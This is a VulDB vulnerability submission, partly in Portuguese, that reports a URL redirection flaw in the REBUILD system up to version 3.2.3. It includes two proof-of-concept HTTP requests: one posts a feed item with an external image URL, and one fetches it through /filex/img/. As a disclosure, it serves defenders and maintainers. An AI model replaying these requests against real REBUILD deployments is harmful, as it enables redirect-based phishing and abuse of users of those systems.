Submeter #103390: A URL redirection vulnerability exists in the/file/img/* * interface of the REBUILD systeminformação

TítuloA URL redirection vulnerability exists in the/file/img/* * interface of the REBUILD system
DescriçãoSuggested description: URL Redirection vulnerability exists in rebuild <=3.2.3 Vulnerability Type: URL Redirection Vendor of Product: https://github.com/getrebuild/rebuild Affected Product Code Base: <=3.2.3 Affected Component: /feeds/post/publish /filex/img/** Attack Type: Remote Request message 1: ``` POST /feeds/post/publish HTTP/1.1 Host: 192.168.0.102:18080 Content-Length: 112 X-AuthToken: Accept: */* X-CsrfToken: X-Requested-With: XMLHttpRequest X-Client: RB/WEB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Origin: http://192.168.0.102:18080 Referer: http://192.168.0.102:18080/feeds/home Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0 Connection: close {"content":"333","images":["http://www.baidu.com"],"scope":"ALL","type":1,"metadata":{"entity":"Feeds"}} ``` Request message 2: ``` GET /filex/img/http://www.baidu.com?imageView2/2/w/300/interlace/1/q/100 HTTP/1.1 Host: 192.168.0.102:18080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Referer: http://192.168.0.102:18080/feeds/home Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0 Connection: close ```
Fonte⚠️ https://github.com/getrebuild/rebuild/issues/596
Utilizador
 Mechoy (UID 41579)
Submissão19/03/2023 18h19 (há 3 anos)
Moderação23/03/2023 19h46 (4 days later)
EstadoAceite
Entrada VulDB223744 [Rebuild até 3.2.3 /feeds/post/publish Script de Site Cruzado]
Pontos20

VoltarVisão GeralPróximo

Do you need the next level of professionalism?

Upgrade your account now!